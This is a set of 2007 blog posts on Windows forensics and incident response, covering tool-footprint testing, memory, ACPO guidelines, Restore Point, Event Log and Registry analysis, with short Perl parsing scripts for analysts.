Thursday, July 12, 2007

Tool Testing Methodology, Memory

In my last post, I described what you'd need to do to set up a system in order to test the effects of a tool we'd use on a system for IR activities. I posted this as a way of filling in a gap left by the ACPO Guidelines, which say that we need to "profile" the "forensic footprint" of our tools. That post described tools we'd need to use to discover the footprints within the file system and Registry. I invite you, the reader, to comment on other tools that may be used, as well as provide your thoughts regarding how to use them...after all, the ACPO Guidelines also state that the person using these tools must be competent, and what better way to get there than through discussion and exchange of ideas?

One thing we haven't discussed, and that doesn't seem to get a great deal of discussion in general, is the effect of the tools we use on memory. One big question that gets asked is, what "impact" do our tools have on memory? This is important to understand, and I think one of the main drivers behind this is the idea that when IR activities are first introduced in a court of law, claims will be made that the responder overwrote or deleted potentially exculpatory data during the response process. So...understanding the effect of our tools will make us competent in their use, and we'll be able to address those (and other) issues.

When a process is created (see Windows Internals, by Russinovich and Solomon for the details, or go here), the EXE file is loaded into memory...the EXE is opened and a section object is created, followed by a process object and a thread object. So, memory pages (default size is 4K) are "consumed". Now, almost all EXEs (and I say "almost" because I haven't seen every EXE file) include an import table in their PE header, which describes all of the dynamic link libraries (DLLs) that the EXE accesses. MS provides API functions via DLLs, and EXEs access these DLLs rather than each author rewriting all of that code from scratch. So...if the necessary DLL isn't already in memory, then it has to be located and loaded...which, in turn, means that more memory pages are "consumed".
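Just to make the import table point a bit more concrete, here's a quick-and-dirty Perl sketch (nothing from the book...just an illustration) that lists the DLLs named in the import table of a 32-bit EXE, i.e., the DLLs that will need to be in memory when the process starts. It assumes a well-formed, unpacked PE32 file and does no real error checking:

# list_imports.pl - minimal sketch: list the DLLs named in the import table
# of a 32-bit PE file. Assumes a well-formed, unpacked PE32 EXE; no error
# handling for packed or malformed files.
use strict;

my $file = shift || die "Usage: list_imports.pl <exe>\n";
open(my $fh, '<', $file) || die "Cannot open $file: $!\n";
binmode($fh);
my $data = do { local $/; <$fh> };
close($fh);

# e_lfanew (the offset to the PE header) lives at offset 0x3C of the DOS header
my $pe_off = unpack("V", substr($data, 0x3c, 4));
die "Not a PE file\n" unless (substr($data, $pe_off, 4) eq "PE\x00\x00");

# NumberOfSections and SizeOfOptionalHeader from the COFF file header
my ($num_sects, $opt_size) = unpack("x2 v x12 v", substr($data, $pe_off + 4, 20));
my $opt_off = $pe_off + 24;
die "Not a 32-bit (PE32) file\n" unless (unpack("v", substr($data, $opt_off, 2)) == 0x10b);

# Data directory entry 1 (the import table) starts at offset 96 + 8 of the
# PE32 optional header; each entry is an RVA/size pair
my $imp_rva = unpack("V", substr($data, $opt_off + 96 + 8, 4));

# Read the section headers so we can translate RVAs into file offsets
my @sects;
my $sect_off = $opt_off + $opt_size;
foreach my $i (0 .. $num_sects - 1) {
    my ($vsize, $va, $rawsize, $rawoff) =
        unpack("x8 V V V V", substr($data, $sect_off + $i * 40, 40));
    push(@sects, [$va, $vsize, $rawoff]);
}

sub rva2off {
    my $rva = shift;
    foreach my $s (@sects) {
        return $rva - $s->[0] + $s->[2]
            if ($rva >= $s->[0] && $rva < $s->[0] + $s->[1]);
    }
    return undef;
}

# Walk the IMAGE_IMPORT_DESCRIPTOR array (20 bytes each) until the all-zero
# terminator; the fourth DWORD in each descriptor is the RVA of the DLL name
my $desc_off = rva2off($imp_rva);
die "No import table found\n" unless (defined $desc_off);
while (1) {
    my $name_rva = unpack("V", substr($data, $desc_off + 12, 4));
    last if ($name_rva == 0);
    print unpack("Z*", substr($data, rva2off($name_rva))), "\n";
    $desc_off += 20;
}

Run something like this against a few of the tools on your response CD and you'll get a feel for just how many DLLs even a "simple" CLI tool pulls in.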

So, knowing that these memory pages are used/written to, what is the possibility that important 'evidence' is overwritten? Well, for one thing, the memory manager will not overwrite pages that are actively being used. If it did, stuff would randomly disappear and stop working. For example, your copy of a document might disappear because you loaded Solitaire and a 4K page was randomly overwritten. We wouldn't like this, would we? Of course not! So, the memory manager allocates to a process only memory pages that are not currently in use.

For an example of this, let's take a look at Forensic Discovery, by Dan Farmer and Wietse Venema...specifically, chapter 8, section 17:

As the size of the memory filling process grows, it accelerates the memory decay of cached files and of terminated anonymous process memory, and eventually the system will start to cannibalize memory from running processes, moving their writable pages to the swap space. That is, that's what we expected. Unfortunately even repeat runs of this program as root only changed about 3/4 of the main memory of various computers we tested the program on. Not only did it not consume all anonymous memory but it didn't have much of an effect on the kernel and file caches.

Now, keep in mind that the tests that were run were on *nix systems, but the concept is the same for Windows systems (note: previously in the chapter, tests run on Windows XP systems were described, as well).

So this illustrates my point...when a new process is loaded, memory that is actively being used does not get overwritten. If an application (Word, Excel, Notepad) is active in memory, and there's a document that is open in that application, that information won't be overwritten...at worst, the pages not currently being used will be swapped out to the pagefile. If a Trojan is active in memory, the memory pages used by the process, as well as the information specific to the process and thread(s) themselves, will not be overwritten.

The flip side of this is that what does get "consumed" are memory pages that are freed for use by the memory manager; research has shown that the contents of RAM can survive a reboot, and that even after a new process (or several processes) have been loaded and run, information about exited processes and threads still persists. So, pages used by previous processes may be overwritten, as will pages that contained information about threads, and even pages that had not been previously allocated.

When we recover the contents of physical memory (ie, RAM), one of the useful things about our current tools is that we can locate a process, and then by walking the page directory and table entries, locate the memory pages used by that process. By extracting and assembling these pages, we can then search them for strings, and anything we locate as "evidence" will have context; we'll be able to associate a particular piece of information (ie, a string) with a specific process. The thing about pages that have been freed when a process has exited is that we may not be able to associate that page with a specific process; we may not be able to develop context for anything we find in that particular page.

Think of it this way...if I dump the contents of memory and run strings.exe against it, I will get a lot of strings...but what context will that have? I won't be able to associate any of the strings I locate in that memory dump with a specific process, using just strings.exe. However, if I parse out the process information, reassembling EXE files and memory used by each process, and then run strings.exe on the results, I will have a considerable amount of context...not only will I know which process was using the specific memory pages, but I will have timestamps associated with the process and its threads, etc.
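To illustrate the difference, here's a throwaway sketch (not one of the tools mentioned above...just an illustration) that scans a raw memory dump in 4K pages for an ASCII string. All it can give you is the page and offset of each hit...which is exactly the "no context" problem:

# pagegrep.pl - minimal sketch: scan a raw memory dump in 4K pages for an
# ASCII string and report the page number and offset of each hit. Without
# mapping pages back to a process, this is all the "context" you get.
# (Hits that span a page boundary are missed...again, just a sketch.)
use strict;

my ($file, $term) = @ARGV;
die "Usage: pagegrep.pl <memory dump> <string>\n" unless ($file && defined $term);

open(my $fh, '<', $file) || die "Cannot open $file: $!\n";
binmode($fh);

my $page_size = 4096;
my $page_num  = 0;
my $page;
while (read($fh, $page, $page_size)) {
    my $pos = 0;
    while (($pos = index($page, $term, $pos)) >= 0) {
        printf("Page %d (file offset 0x%x): hit at page offset 0x%x\n",
               $page_num, $page_num * $page_size, $pos);
        $pos++;
    }
    $page_num++;
}
close($fh);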

Thoughts? I just made all this up, just now. ;-) Am I off base, crazy, a raving lunatic?

Tool Testing Methodology

As I mentioned earlier, the newly-released ACPO Guidelines state:

By profiling the forensic footprint of trusted volatile data forensic tools,

Profiling, eh? Forensic footprint, you say? The next logical step is...how do we do this? Pp. 46 - 48 of my book make a pretty good start at laying this all out.

First, you want to be sure to document the tool you're testing...where you found it, the file size, cryptographic hashes, any pertinent info from the PE header, etc.

Also, when testing, you want to identify your test platform (OS, tools used, etc.) so that the tests you run are understandable and repeatable. Does the OS matter? I'm sure some folks don't think so, but it does! Why is that? Well, for one, the various versions of Windows differ...for example, Windows XP performs application prefetching by default. This means that when you run your test, depending upon how you launch the tool you're testing, you may find a .pf file added to the Prefetch directory (assuming that the number of .pf files hasn't reached the 128 file limit).

So, what testing tools do you want to have in place on the testing platform? What tools do we need to identify the "forensic footprint"? Well, you'll need two classes of tools...snapshot 'diff' tools, and active monitoring tools. Snapshot 'diff' tools allow you to snapshot the system (file system, Registry) before the tool is run, and again afterward, and then allow you to 'diff' the two snapshots to see what changed. Tools such as InControl5 and RegShot can be used for this purpose.
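InControl5 and RegShot will do the heavy lifting for you, but just to show how simple the file system half of the idea is, here's a minimal sketch of a snapshot script...run it before and after executing the tool you're testing, redirect the output to two files, and 'diff' them (the Registry side of the house would work the same way):

# fs_snap.pl - minimal sketch of the "snapshot" half of a snapshot/diff tool:
# walk a directory tree and record the path, size, last-write time, and MD5
# hash of every file. Take one snapshot before running the tool being tested
# and one after, then diff the two output files to see what changed.
use strict;
use File::Find;
use Digest::MD5;

my $dir = shift || die "Usage: fs_snap.pl <directory> > snapshot.txt\n";

find({ wanted => \&wanted, no_chdir => 1 }, $dir);

sub wanted {
    my $file = $File::Find::name;
    return unless -f $file;
    my ($size, $mtime) = (stat($file))[7, 9];
    open(my $fh, '<', $file) || return;
    binmode($fh);
    my $md5 = Digest::MD5->new->addfile($fh)->hexdigest();
    close($fh);
    print "$file|$size|$mtime|$md5\n";
}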

For active monitoring tools, I'd suggest Process Monitor from MS SysInternals. This tool allows you to monitor file and Registry accesses in real-time, and then save that information for later analysis.

In order to monitor your system for network activity while the tool is run, I'd suggest installing PortReporter on your system as part of your initial setup. The MS KB article (click on "PortReporter") also includes links to the MS PortQry and PortQryUI tools, as well as the PortReporter Log Parser utility for parsing PortReporter logs.

As many of the tools used in IR activities are CLI tools and will execute and complete fairly quickly, I'd also suggest enabling Process Tracking auditing on your test system, so that event records for process creation will be recorded.

Okay, so all of this covers a "forensic footprint" from the perspective of the file system and the Registry...but what about memory? Good question! Let's leave that for another post...

Thoughts so far?

Wednesday, July 11, 2007

Are you Security Minded?

Kai Axford posted on his blog that he's been "terribly remiss in his forensic discussions". This originated with one of Kai's earlier posts on forensic resources; I'd commented, mentioning my own books as resources.

Kai...no need to apologize. Really. Re: TechEd...gotta get approval for that from my Other Boss. ;-)

Updates, etc.

Since I haven't been posting anywhere close to regularly lately, I felt that a couple of updates and notices of new finds were in order...

First off, James MacFarlane has updated his Parse-Win32Registry module, fixing a couple of errors, adding a couple of useful scripts (regfind.pl and regdiff.pl...yes, that's the 'diff' you've been looking for...), and adding a couple of useful functions. Kudos to James, a huge thanks, and a hearty "job well done"! James asked me if I was still using the module...I think "abuse" would be a better term! ;-)
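If you haven't tried the module yet, here's a quick sketch of why it's so handy...no Windows API, no live system, just a raw hive file. The hive and key path below (the Run key from a user's NTUSER.DAT file) are just examples; substitute whatever you're interested in:

# regpeek.pl - quick sketch using the Parse-Win32Registry module to pull a
# key's LastWrite time and values from a raw hive file, with no Windows API
# involved. The hive and key path are just examples.
use strict;
use Parse::Win32Registry;

my $hive = shift || die "Usage: regpeek.pl <NTUSER.DAT>\n";
my $key_path = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run';

my $registry = Parse::Win32Registry->new($hive)
    || die "Could not parse $hive as a Registry hive file\n";
my $root_key = $registry->get_root_key();

if (my $key = $root_key->get_subkey($key_path)) {
    print "Key       : ", $key->get_name(), "\n";
    print "LastWrite : ", scalar gmtime($key->get_timestamp()), " UTC\n";
    foreach my $val ($key->get_list_of_values()) {
        printf("  %-20s %s\n", $val->get_name(), $val->get_data());
    }
}
else {
    print "$key_path not found.\n";
}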

An RTF version of Forensic CaseNotes has been released. I use this tool in what I do...I've added a tab or two that is useful for what I need and do, and I also maintain my analysis and exhibit list using CaseNotes. Now, with RTF support, I can add "formatted text, graphics, photos, charts and tables". Very cool!

LonerVamp posted about some MAC changing and Wifi tools, and I got to thinking that I need to update my Perl scripts that use James' module to include looking for NICs with MACs specifically listed in the Registry. Also, I saw a nifty tool called WirelessKeyView listed...looks like something good to have on your tools CD, either as an admin doing some troubleshooting, or as a first responder.

Another useful tool to have on your CD is Windows File Analyzer, from MiTeC. This GUI tool is capable of parsing some of the more troublesome, yet useful files from a Windows system, such as Prefetch files, shortcut/LNK files, and index.dat files. So...what's in your...uh...CD?

LonerVamp also posted a link to MS KB 875357, Troubleshooting Windows Firewall settings in Windows XP SP2. You're probably thinking, "yeah? so?"...but look closely. From a forensic analysis perspective, take a look at what we have available to us here. For one, item 3 shows the user typing "wscui.cpl" into the Run box to open the Security Center applet...so if you're performing analysis and you find "wscui.cpl" listed in the RunMRU or UserAssist keys, what does that tell you?

What other useful tidbits do you find in the KB article that can be translated into useful forensic analysis techniques? Then, how would you go about automating that?

Another useful tool if you're doing any work with scripts (JavaScript, etc.) in HTML files, is Didier Stevens' ExtractScripts tool. The tool is written in Python, and takes an HTML file as an argument, and outputs each script found in the HTML file as a separate file. Very cool stuff!

Some cool stuff...anyone got anything else they'd like to add?

ACPO Guidelines

The Association of Chief Police Officers (ACPO), in association with 7safe, has recently released their updated guide to collecting electronic evidence. While the entire document makes for an interesting read, I found pages 18 and 19, "Network forensics and volatile data" most interesting.

The section begins with a reference back to Principle 2 of the guidelines, which states:

In circumstances where a person finds it necessary to access original data held on a computer or on storage media, that person must be competent to do so and be able to give evidence explaining the relevance and the implications of their actions.

Sounds good, right? We should also look at Principle 1, which states:

No action taken by law enforcement agencies or their agents should change data held on a computer or storage media which may subsequently be relied upon in court.

Also, Principle 3 states:

An audit trail or other record of all processes applied to computer-based electronic evidence should be created and preserved. An independent third party should be able to examine those processes and achieve the same result.

Okay, I'm at a loss here. Collecting volatile data inherently changes the state of the system, as well as the contents of the storage media (i.e., Prefetch files, Registry contents, pagefile, etc.), and the process used to collect the volatile data cannot be later used by a third party to "achieve the same result", as the state of the system at the time that the data is collected cannot be reproduced.

That being said, let's move on...page 18, in the "Network forensics and volatile data" section, includes the following:

By profiling the forensic footprint of trusted volatile data forensic tools, an investigator will be in a position to understand the impact of using such tools and will therefore consider this during the investigation and when presenting evidence.

It's interesting that this says "profiling the forensic footprint", but says nothing about error rates or statistics of any kind. I fully agree that this sort of thing needs to be done, but I would hope that it would be done and made available via a resource such as the ForensicWiki, so that not every examiner has to run every test of every tool.

Here's another interesting tidbit...

Considering a potential Trojan defence...

Exactly!

Continuing on through the document, I can't say that I agree with the order of the sequence for collecting volatile data...specifically, the binary dump of memory should really be first, not last. This way, you can collect the contents of physical memory in as near a pristine state as possible. I do have to question the use of the term "bootable" to describe the platform from which the tools should be run, as booting to this media would inherently destroy the very volatile data you're attempting to collect.

Going back to my concerns (the part where I said I was "at a loss") above, I found this near the end of the section:

By accessing the devices, data may be added, violating Principle 1 but, if the logging mechanism is researched prior to investigation, the forensic footprints added during investigation may be taken into consideration and therefore Principle 2 can be complied with.

Ah, there we go...so if we profile our trusted tools and document what their "forensic footprints" are, then we can identify our (investigators) footprints on the storage media, much like a CSI following a specific route into and out of a crime scene, so that she can say, "yes, those are my footprints."

Thoughts?

Thursday, July 05, 2007

Windows Forensic Analysis Book Review Posted

Richard Bejtlich has posted a review of Windows Forensic Analysis on Amazon.

5 (count 'em!) stars! Wow! The review starts with:
Wow -- what a great forensics book -- a must read for investigators.

Very cool. High praise, indeed!

Thanks, Richard!

Wednesday, June 27, 2007

Book Updates

I got word yesterday that Syngress is going to discontinue selling hard copy books from their web site. They will continue to sell ebooks, and provide links to other online retailers.

The new link for my book is here.

Sunday, June 17, 2007

What is RAM, legally speaking?

Ever wondered what the legal definition of "RAM" is? I was perusing the Computer Forensics and Incident Response blog this morning and found an interesting post regarding RAM and the US Courts. In short, a court document (judge's decision) from the case of Columbia Pictures Industries, et al, vs Justin Bunnell, et al, was posted on the web, and contains some interesting discussion regarding RAM.

In short, the document illustrates a discussion in which RAM constitutes "electronically stored information", and can be included in discovery. The document contains statements such as "...Server Log Data is temporarily stored in RAM and constitutes a document...".

Interestingly enough, there is also discussion of "spoliation of evidence" due to the defendant's failure to preserve/retain RAM.

The defendants claimed that, in part, they could not produce the server log data from RAM due to burden of cost...which the judge's decision states that they failed to demonstrate. There are some interesting notes that address issues of RAM as "electronically stored information" from which key data would otherwise not be available (ie, the document states that the server's logging function was not enabled, but the requests themselves were stored in RAM).

Ultimately, the judge denied the plaintiff's request for evidentiary sanctions due to the defendant's failure to preserve the contents of RAM, partially due to a lack of prior precedent and a specific request to preserve RAM (the request was for documents).

The PDF document is 36 pages long, and well worth a read. I will not attempt to interpret a legal document here...I simply find the judge's decision that yes, RAM constitutes electronically stored information, however temporary, to be very interesting.

What are your thoughts? How do you think this kind of issue will fare given that there are no longer any freely available tools for dumping the contents of Physical Memory from Windows systems?

Addendum: An appeal brief has been posted by the defendant's lawyers.

Saturday, June 16, 2007

Restore Point Analysis

Others have posted bits and pieces regarding System Restore Point analysis (Stephen Bunting's site has some great info), and I've even blogged on this topic before, but I wanted to add a bit more information and a tidbit or two I've run across. This will go a bit beyond what's in my book, but I do want to say that the content in my book is not invalidated in any way.

First off, you can use some of the tools on the DVD accompanying my book in either live response or during post-mortem analysis to collect information from the Restore Points. I've recently updated the code to the SysRestore.pl ProDiscover ProScript to make it more usable and flexible, given some situations I've seen recently.

Another interesting thing I've run across is that using an alternative method of analysis, such as mounting the acquired image as a read-only drive letter (using VDKWin or Mount Image Pro), can be as much of a problem as a solution. Accessing the image this way can really be a boon to the examiner, as you can hit it with an AV scanner (...or two...or three...) and save yourself a great deal of time trying to locate malware. However, the problem is that the ACLs on the System Volume Information directory require System level access on that system, and having System level access on your analysis system does not equate to System level access on the mounted image. So things tend not to work as well...files within the "protected" directories will not be scanned, and your alternative is to either perform your analysis within a forensic analysis application such as ProDiscover (using ProScripts), or export the entire directory structure out of the image, at which point storage becomes a consideration (I've seen systems with quite a number of Restore Points).

This can be an issue because bad guys may try to hide stuff in these directories...read on...

Remember me mentioning the existence of web browsing history for the Default User? This indicates the use of the WinInet API (wget.exe, IE, etc.) by someone who accessed the system with System level privileges. This level of access would also allow that user to access the System Volume Information directory, where the Restore Points are maintained, and possibly put things there, such as executable image files, etc. It's unlikely that a restore point would be used for persistence (ie, point a Windows Service to an executable image within a restore point), as the restore points eventually get deleted or flushed out (see the fifo.log file). However, this would be an excellent place to put an installer or downloader file, and then the intruder could place the files that he wanted to be persistent in either the System Volume Information directory, or the "_restore*" directory.

So, besides looking for files that we know are in the Restore Points (ie, drivetable.txt, rp.log, Registry files), we should also consider looking for files that shouldn't be there, particularly if we find other artifacts that indicate a System-level intrusion.

Beyond this, Restore Points provide a wealth of historical information about the system. By parsing all of the rp.log files, we can develop a timeline of activity on the system that will give us an idea of what was done (system checkpoint, application install/uninstall, etc.) as well as provide us with that timeline...if the Restore Points are in sequence but the dates seem skewed, then we have an indication that someone may have fiddled with the system time. Using the drivetable.txt file, you can see what drives were attached to the system at the time that the Restore Point was created (by default, one is created every 24 hrs).
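As an illustration, here's a rough sketch of that timeline idea...it walks the RP## directories and pulls the description and creation time from each rp.log. The offsets used (Unicode description at 0x10, FILETIME in the last 8 bytes of the file) are from my own notes, so verify them against your own data before relying on the output:

# rptimes.pl - sketch: walk the RP## directories under a copied-out
# _restore* directory and pull the description and creation time from each
# rp.log. Offsets (description at 0x10, FILETIME in the last 8 bytes) should
# be verified against your own data.
use strict;

my $restore_dir = shift || die "Usage: rptimes.pl <_restore directory>\n";

opendir(my $dh, $restore_dir) || die "Cannot open $restore_dir: $!\n";
my @rps = sort { ($a =~ /(\d+)/)[0] <=> ($b =~ /(\d+)/)[0] }
          grep { /^RP\d+$/ } readdir($dh);
closedir($dh);

foreach my $rp (@rps) {
    my $log = "$restore_dir\\$rp\\rp.log";
    next unless (-e $log);
    open(my $fh, '<', $log) || next;
    binmode($fh);
    my $data = do { local $/; <$fh> };
    close($fh);

    # Description: null-terminated Unicode (UTF-16LE) string at offset 0x10
    my ($desc) = substr($data, 0x10) =~ /^((?:..)*?)\x00\x00/s;
    $desc = "" unless (defined $desc);
    $desc =~ s/\x00//g;

    # Creation time: 64-bit FILETIME (100-nanosecond intervals since 1601)
    # in the last 8 bytes of the file, converted to Unix epoch time
    my ($lo, $hi) = unpack("VV", substr($data, -8));
    my $epoch = int(($hi * 4294967296 + $lo) / 10000000) - 11644473600;

    printf("%-8s %-28s %s\n", $rp, scalar gmtime($epoch) . " UTC", $desc);
}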

Beyond these files, we also have access to the Registry files that are backed up to the Restore Points. You can parse these to see if and when a user's privilege levels were modified (ie, added to the Administrator group), determine IP addresses and network settings for the system (parse the NetworkCards key from the Software file, then the Tcpip Services key from the System file), etc.

Analysis of the Registry files maintained in Restore Points is also useful in determining a timeline for certain Registry modifications that are difficult to pin down. For example, when a Registry value is added or modified, the key's LastWrite time is updated. What if one value is added, and one is modified...how do we determine which action caused the LastWrite time to be modified? Well, by using the historical data maintained in the Restore Points, we can look back and see that on this date, the modified value was there, but the added value wasn't...and then it appears in the next Restore Point. Not exact, but it does give us a timeline.
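Here's a sketch of what that looks like in practice, using the Parse-Win32Registry module against the Software hives backed up in each Restore Point. The key path and value name here are made up for the example...plug in the ones you're actually chasing:

# rp_valhunt.pl - sketch: check each Restore Point's backed-up Software hive
# for a specific value, to bracket when it first appeared. Key path and
# value name are examples only.
use strict;
use Parse::Win32Registry;

my $restore_dir = shift || die "Usage: rp_valhunt.pl <_restore directory>\n";
my $key_path = 'Microsoft\\Windows\\CurrentVersion\\Run';
my $val_name = 'suspect_app';

my @rps = sort { ($a =~ /RP(\d+)/)[0] <=> ($b =~ /RP(\d+)/)[0] }
          glob("$restore_dir/RP*");

foreach my $rp (@rps) {
    my $hive = "$rp/snapshot/_REGISTRY_MACHINE_SOFTWARE";
    next unless (-e $hive);
    my $registry = Parse::Win32Registry->new($hive) || next;
    my $key = $registry->get_root_key()->get_subkey($key_path);
    next unless ($key);
    my $present = defined($key->get_value($val_name)) ? "PRESENT" : "not present";
    printf("%-40s %-12s key LastWrite: %s UTC\n",
           $rp, $present, scalar gmtime($key->get_timestamp()));
}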

So...what interesting things have you found in Restore Points?

Links
Kelly's Korner (XP Restore Points)
MS Windows XP System Restore
System Restore WMI Classes

Thursday, June 14, 2007

EventLog Analysis

In my book, I covered the Windows 2000, XP, and 2003 EventLog file header and event record structure in some detail. There's also a Perl script or two on the DVD that accompanies the book that let you parse an Event Log without using the Windows API, so that you avoid that pesky message about the Event Log being corrupted.

I've since updated one of the scripts (changing the name to evt2xls.pl), so that now it writes the information that it parses from the Event Log file directly into an Excel spreadsheet, even going so far as to format the date field so that it "makes sense" to Excel when you want to sort based on the date. I've found that writing the data directly to a spreadsheet makes things a bit easier for me, particularly when I want to sort the data to see just certain event record sources, or perform some other analysis.

I've also added some functionality to collect statistics from the Event Log file, and display information such as total counted event records, frequency of event sources and IDs, etc., in a separate report file. I've found these to be very useful and efficient, giving me a quick overview of the contents of the Event Logs, and making my analysis of a system go much smoother, particularly when combined with Registry analysis (such as parsing the Security file for the audit policy...see the Bonus directory on the DVD for the Perl script named poladt.pl and its associated EXE file). One of the things I'm considering adding to this script is reporting of successful and failed login attempts, basing this reporting in part on the type of the login attempt (ie, Service vs Local vs Remote).

Here's something to think about...there is sufficient information in the book, and Perl code on the DVD, such that you can create tools for parsing event records from other sources, such as RAM dumps, the pagefile, and even unallocated space. I'm considering writing a couple of small tools to do this...not to search files for records, specifically (I can add that to the code that parses RAM dumps), but to start by simply extracting event records given a file and an offset within the file.
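As a starting point, here's a bare-bones sketch (not the evt2xls.pl script) of the "given a file and an offset" idea. It parses a single record using the event record structure described in the book, checking only for the "LfLe" magic number, so it will work against an .evt file, a RAM dump, or anything else you point it at:

# evtrec.pl - bare-bones sketch: given a file (Event Log, pagefile, RAM dump,
# whatever) and an offset, parse a single event record. No sanity checking
# beyond the "LfLe" magic number.
use strict;

my ($file, $offset) = @ARGV;
die "Usage: evtrec.pl <file> <offset>\n" unless ($file && defined $offset);
$offset = oct($offset) if ($offset =~ /^0x/i);

open(my $fh, '<', $file) || die "Cannot open $file: $!\n";
binmode($fh);
seek($fh, $offset, 0);

# Fixed-length portion of the record: length, magic, record number, time
# generated, time written, event ID (DWORDs), then event type, number of
# strings, and category (WORDs)
my $hdr;
read($fh, $hdr, 56);
my ($len, $magic, $rec_num, $time_gen, $time_wrt, $event_id,
    $type, $num_strs, $category) = unpack("V6 v3", $hdr);
die "No event record magic number (LfLe) at that offset\n"
    unless ($magic == 0x654c664c);

# The source and computer names follow the fixed-length portion as
# null-terminated Unicode (UTF-16LE) strings
my $rest;
read($fh, $rest, $len - 56);
my ($src, $comp) = map { my $s = $_; $s =~ s/\x00//g; $s }
                   (split(/\x00\x00/, $rest))[0, 1];
close($fh);

print  "Record Number : $rec_num\n";
print  "Source        : $src\n";
print  "Computer      : $comp\n";
printf("Event ID      : %d\n", $event_id & 0xffff);
print  "Event Type    : $type\n";
print  "Strings       : $num_strs\n";
print  "Time Generated: ", scalar gmtime($time_gen), " UTC\n";
print  "Time Written  : ", scalar gmtime($time_wrt), " UTC\n";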

But what about actual Event Log analysis? What about really using the Event Log to get some insight into activity on the system? What can we look for and how can we use it?

Here are some tidbits that I've come across and use...please don't consider this a complete list, as I hope that people will contribute. This is just to get folks started...

Stephen Bunting has a great write-up that explains how to use the Event Log to track time change events, such as when someone alters their system time.

The Application Event Log is a great place to look for events generated by antivirus applications. This will not only tell you if an antivirus application is installed on the system (you can also perform Registry analysis to determine this information), but perhaps the version, when it was active, etc.

In the System Event Log, Event ID 6161 (Source: Print) tells you when a file failed to print. The event message tells you the name of the file that failed to print, the username, and the printer.

Also in the System Event Log, Event ID 35 (Source: W32Time) is an Information event that tells you that your system is sync'ing with a time server, and provides the IP address of your system. This can be very useful in a DHCP environment, as it tells you the IP address assigned to the system (actually, the interface) at a particular date and time.

Windows Defender (Source: WinDefend) will generate an event ID 1007 when it detects malware on a system; the event strings contain specific information about what was found.

Whenever you're doing Event Log analysis, be sure to go to EventID.net for help understanding what you're looking at. Most of the listed event IDs have detailed explanations of what can cause the event, as well as links to information at MS.

Again, this is not a complete list of items that you may find and use in your analysis...these are just some things that come to mind. And remember, you get a bit more out of Event Log analysis when you combine it with Registry analysis, not only of the audit policy for the system and the settings for the Event Logs, but with other sources, as well.

Links
EventLog Header structure
Event Record structure
EventLog EOF record structure
EventLog File Format

Wednesday, June 13, 2007

Determining the version of XP

I received an interesting comment to one of my recent blog posts...the poster was musing that he wished he could determine the version of XP (Home or Pro), presumably during a post-mortem examination. As this struck my interest, I began to research this...and most of what I found applies to a live running system. For example, MS has a KB article that tells you how to determine the version of XP you've got. Also, the WMI class Win32_OperatingSystem has a value called "SuiteMask" which will let you determine the version of the operating system; to see if you're on the Home version of XP, perform a logical AND operation with the SuiteMask value and 0x0200 (the "Personal" bit) - if it succeeds, you're on XP Home. You can also use the Win32::GetOSVersion() function in Perl, or implement the WMI Win32_OperatingSystem class in Perl.
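For the live-system side of things, a sketch of that SuiteMask check in Perl (using Win32::OLE to talk to WMI) might look something like this:

# xpver.pl - sketch: check the SuiteMask property of Win32_OperatingSystem
# via WMI on a live system; if the "Personal" bit (0x0200) is set, the
# system is running XP Home.
use strict;
use Win32::OLE qw(in);

my $wmi = Win32::OLE->GetObject("winmgmts:\\\\.\\root\\cimv2")
    || die "Cannot connect to WMI: " . Win32::OLE->LastError() . "\n";

foreach my $os (in $wmi->InstancesOf("Win32_OperatingSystem")) {
    printf("Caption   : %s\n", $os->{Caption});
    printf("SuiteMask : 0x%04x\n", $os->{SuiteMask});
    print(($os->{SuiteMask} & 0x0200)
        ? "The Personal bit is set...this is XP Home.\n"
        : "The Personal bit is not set...this is not XP Home.\n");
}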

This information seems to be maintained in memory, and appears to be retrieved using the GetVersionEx() API function. Running a couple of tests to extract the information while running RegMon doesn't appear to reveal anything interesting as far as Registry keys that are accessed while attempting to determine the OS version.

During a post-mortem examination, you can go to the file "%WinDir%\system32\eula.txt" and locate the last line of the file that begins with "EULAID", and you'll see something similar to:

EULAID:XPSP2_RM.0_PRO_OEM_EN

If it says "HOM" instead of "PRO", you're dealing with the Home version of XP.

Also, you can try the file "%windir%\system32\prodspec.ini", and right below the line that says "[Product Specification]", you'll see an entry that will tell you which version of the OS you're working with (note: be sure to check the last modification date on these files, as well...).
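Here's a quick-and-dirty sketch of those post-mortem checks, run against a system32 directory exported or mounted from an image. It assumes both files are plain text and that prodspec.ini uses a "Product=" line under that section header, so treat it as a starting point rather than gospel:

# xpver_img.pl - sketch for the post-mortem side: given the system32
# directory from an image, check eula.txt and prodspec.ini for the product
# designation. Assumes plain-text files and a "Product=" line in prodspec.ini.
use strict;

my $sys32 = shift || die "Usage: xpver_img.pl <path to system32 dir>\n";

if (open(my $fh, '<', "$sys32/eula.txt")) {
    my $eulaid;
    while (<$fh>) {
        $eulaid = $1 if (/(EULAID:\S+)/);
    }
    close($fh);
    if (defined $eulaid) {
        print "$eulaid\n";
        print(($eulaid =~ /_PRO_/) ? "Looks like XP Pro\n"
            : ($eulaid =~ /_HOM/)  ? "Looks like XP Home\n"
            : "Unrecognized EULAID\n");
    }
}

if (open(my $fh, '<', "$sys32/prodspec.ini")) {
    my $in_section = 0;
    while (<$fh>) {
        $in_section = 1 if (/^\[Product Specification\]/i);
        if ($in_section && /^Product=(.*)/i) {
            print "Product: $1\n";
            last;
        }
    }
    close($fh);
}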

Links
Determine the version of IE installed
Check the Version of Office XP
Determine the Windows version using C# (using VB)
32- or 64-bit version of Windows?

Monday, June 11, 2007

Some Registry stuff...

I like "Registry stuff". I don't know what the fascination is, but for some reason, I love stuff that has to do with the Registry.

Anyway, I ran across something recently...I was looking at one of my own systems and ran across an interesting value in my AppInit_DLLs Registry value. Just the fact that there was data within this value was interesting enough! But then I saw something even more interesting...another value named LoadAppInit_DLLs. I haven't found anything specific about this value at the MS site yet, but this appears to be a Vista-only Registry value, in that it is only recognized and utilized by the Vista operating system. This is covered briefly in Symantec's Analysis of the Windows Vista Security Model paper.

This value appears to be used by PGP, as well as some tools from Google (both of these are based on Google searches for occurrences of the value name).

On the topic of the Registry, here's how to use PowerShell to get the name of the last user to log onto a system.

So, what are you looking in the Registry for...or looking for in the Registry?

Links:
Forensics Wiki: Windows Registry
The Windows Registry as a Forensic Resource
Alien Registry Viewer
32-bit Application access to the Registry on 64-bit versions of Windows

Windows Forensic Analysis Book Review

Andrew Hay posted the first review of my book...that I'm aware of! ;-)

Andrew also posted the review on Amazon!

Thanks, Andrew!

